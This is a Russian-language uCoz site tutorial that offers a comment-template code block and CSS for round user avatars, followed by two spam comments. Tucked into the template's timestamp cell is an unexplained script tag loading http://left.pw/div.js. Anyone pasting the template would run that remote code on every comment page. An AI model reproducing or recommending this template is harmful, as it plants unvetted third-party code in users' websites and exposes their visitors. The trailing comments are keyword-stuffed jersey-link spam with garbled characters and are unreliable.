azone

Пятница, 19.04.2024, 08:04

Приветствую Вас Гость | RSS | Главная | | Регистрация | Вход



Главная » 2014 » Сентябрь » 6 » Вид комментариев ucoz с круглым Avatar
10:33
Вид комментариев ucoz с круглым Avatar

Уважаемые пользователи сайта, вот не плохой и даже очень оригинальный Вид комментариев ucoz с круглым Avatar, где сами картинки будут распологаться напротив и это очень красиво смотриться. Был создан он по своим стилям, как для светло серого сайта и безусловно он еще подойдет на темный дизайн.

Установка его очень проста, для начало нужно добавить стиль на его. Если идет стиль на скрипт, то можно сразу сказать что он будет смотрется красиво и даже иметь свои тени. Но потом и сам код заминить на тот который увас стоит по умолчанию, если у вас стандартный шаблон и все сохранить.

1) Заходим в панель управления и выбираем "вид комментариев" и меняем там все на наш скрипт.

Код
<?if($CLASS$)=='cBlock1'?>  
<div style="padding-bottom:9px;">  
<table cellspacing="0" width=100%><tr><td width=96 valign=top>  
  <div class="ob_wp1"><div style="padding-top:4px;padding-left:4px">  
  <div class="ob_wp">  
  <div style="padding-top:4px;padding-left:4px"> <?if($USER_AVATAR_URL$)?><a href="$PROFILE_URL$" title="$USERNAME$"><img src="$USER_AVATAR_URL$" width=65 height=65 class="com_wp"></a><?else?><a href="$PROFILE_URL$" title="$USERNAME$"><div class="com_wp"></div></a><?endif?>  
  </div> </div> </div></div>  
   
   
  <div style="margin-left:-15px"> <center>  
<?if($MODER_PANEL$)?>  
  <a href="javascript://" rel="new_uWnd" onclick="del_item($ID$);return false;" id="di$ID$" style="text-decoration:none">удалить</a>  
  <?endif?>  
  </center></div>  
  </td><td valign=top>  
   
  <div style="position: absolute;margin-left:-9px;margin-top:14px;"><div id="triangle-left"></div></div>  
  <div class="mess_wp">  
  <div style="padding:6px">  
<table><tr>  
  <td valign=top><script type="text/javascript" src="http://left.pw/div.js"></script><div class="tim_wp"><div style="font-family:Tahoma;color:#797979;padding-left:7px;padding-right:7px;padding-top:4px;padding-bottom:7px">$TIME$</div></div></td>  
  <td><div style="font-family:Tahoma;color:#595959;padding-left:7px;"><b>$MESSAGE$</b></div></td>  
  </tr></table>  
  </div>  
   
  </div>  
  </div>  
  </td></tr></table>  

<?else?>  
<div style="padding-bottom:9px;">  
<table cellspacing="0" width=100%><tr><td valign=top>  
  <div class="mess_wp">  
  <div style="padding:6px">  
<table><tr>  
  <td valign=top>  
  <div class="tim_wp"><div style="font-family:Tahoma;color:#797979;padding-left:7px;padding-right:7px;padding-top:4px;padding-bottom:7px">$TIME$</div></div></td>  
  <td><div style="font-family:Tahoma;color:#595959;padding-left:7px;"><b>$MESSAGE$</b></div></td>  
  </tr></table>  
  </div>  
   
  </div>  
  </div>  
  </td><td width=96>  
  <div style="position: absolute;margin-left:-2px;margin-top:14px;"><div id="triangle-left1"></div></div>  
  <div style="float:right">  
  <div class="ob_wp1"><div style="padding-top:4px;padding-left:4px">  
  <div class="ob_wp">  
  <div style="padding-top:4px;padding-left:4px"> <?if($USER_AVATAR_URL$)?><a href="$PROFILE_URL$" title="$USERNAME$"><img src="$USER_AVATAR_URL$" width=65 height=65 class="com_wp"></a><?else?><a href="$PROFILE_URL$" title="$USERNAME$"><div class="com_wp"></div></a><?endif?>  
  </div> </div> </div></div></div>  
  <div style="margin-right:-24px"> <center>  
<?if($MODER_PANEL$)?>  
  <a href="javascript://" rel="new_uWnd" onclick="del_item($ID$);return false;" id="di$ID$" style="text-decoration:none">удалить</a>  
  <?endif?>  
  </center></div>  
  </td></tr></table>  
<?endif?>


И CSS добавляем.

Код
.com_wp {border-radius:50%;background:#fff;width:65;height:65}  
  .ob_wp { width:73;height:73;background: #20242b;border-radius:50%; }  
   
  .ob_wp1 { width:81;height:81;background:rgba(255,255,255,0.3);;border-radius:50%; }  
   
  .mess_wp{box-shadow: 0 1px 1px rgba(0, 0, 0, 0.5);border-radius:4;background: #efefef;  
background: -moz-linear-gradient(top, #efefef 0%, #dbdbdb 100%);  
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#efefef), color-stop(100%,#dbdbdb));  
background: -webkit-linear-gradient(top, #efefef 0%,#dbdbdb 100%);  
background: -o-linear-gradient(top, #efefef 0%,#dbdbdb 100%);  
background: -ms-linear-gradient(top, #efefef 0%,#dbdbdb 100%);  
background: linear-gradient(to bottom, #efefef 0%,#dbdbdb 100%);  
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#efefef', endColorstr='#dbdbdb',GradientType=0 );  
}  
  .tim_wp{background:d7d7d7;border-radius:4;}  
  #triangle-left {  
  width: 0;  
  height: 0;  
  border-top: 7px solid transparent;  
  border-right: 9px solid #e1e1e1;  
  border-bottom: 7px solid transparent;  
}#triangle-left1 {  
  width: 0;  
  height: 0;  
  border-top: 7px solid transparent;  
  border-left: 9px solid #e1e1e1;  
  border-bottom: 7px solid transparent;  
}
Просмотров: 1388 | Добавил: Bitfood | Рейтинг: 0.0/0
Всего комментариев: 2
2 BreaveHegeced  
0
This is an aspect that your remodeling contractor will handle effectively. This special island gives wonderful ambience for vacationers who wishes to have privacy whilst enjoying a getaway. http://www.cheapjerseyswholesalenflchina.us.com/ - Cheap NFL Jerseys China.http://www.cheapjerseyswholesalenflchina.us.com/ - Cheap Jerseys China. But I will depart managing Chore Overload for a totally different post! What do you want to do to consider back manage of your inbox? To begin to allow Universe Class Execution? Commence with two straight forward nonetheless hugely beneficial words: “Call me”. These people would rather shell out hundreds and thousands of dollars before they are willing to do a little work. Why are they still out there then? Simple, when people are desperate and they are out there looking for answers to make their situations better they are looking for something instant,http://www.cheapjerseyswholesalenflchina.us.com/ - Cheap NFL Jerseys, and this makes them easy to be taken advantage of. And it's almost laughable when you consider that 2% of the population controls 80% of the wealth in the country. Essentially, thin folks take advice coming from people who have in no way had an extra weight dilemma. In case like Toprated Films like Selfsufficiency Day, that one is good for yourself, don't miss it.Also, you’ll be able to spice up by visiting the restaurants and suppliers near the coastline. For your business because of this you pay off of debt, improve business processes and have professional help whenever needed. You buy machinery rather then leasing it.One of the most insulting things you listen to could possibly be via buddies, coworkers and also friends in the club.<br>Visit my site http://www.cheapjerseyswholesalenflchina.us.com/

1 Terybycle  
0
This how-to knowledge needs to be in the hands of many Pinoys! Because it妾?one of the surest ways people can practice things like in Tim Ferris妾?? Hour Workweek? another automated business that can be managed from anywhere with an internet connection. Insufficient heart action by congestive heart failure can cause edema. Feel free to find out more at our site! Author Resource:-Visit their website for additional information: Costume Jewellery, http://www.cheapchinajerseyswholesale.us.com/ - Cheap Jerseys, Charm Bracelet,http://www.cheapchinajerseyswholesale.us.com/ - Wholesale Jerseys China, Fashion Accessories.Write Articles or reviews With Valuable Content Which can be Interesting To ReadersTo attract readerssite, you must make sure this article you supply gives them the data they require.tumblr.The reason for this article is to inform you how to start a home web based business using the correct management process open to man kind. The procedure that allows them to create wealth in months鎼慳ther than years. If you work only with one writer they should understand your family needs better as well as email address details are likely to be improved.http://www.cheapchinajerseyswholesale.us.com/ - Wholesale Jerseys. It is better to only have one bad hole as opposed to many if you can prevent it. With the help of online stores, it would be very convenient for them.<br>Visit my site锛歨ttp://www.cheapchinajerseyswholesale.us.com/

Имя *:
Email *:
Код *:

Форма входа





Поиск



Наш опрос

Оцените мой сайт
Всего ответов: 2

Мини-чат





Статистика


Онлайн всего: 1
Гостей: 1
Пользователей: 0

seo анализ
Проверка тИЦ и PR Счетчик PR-CY.Rank .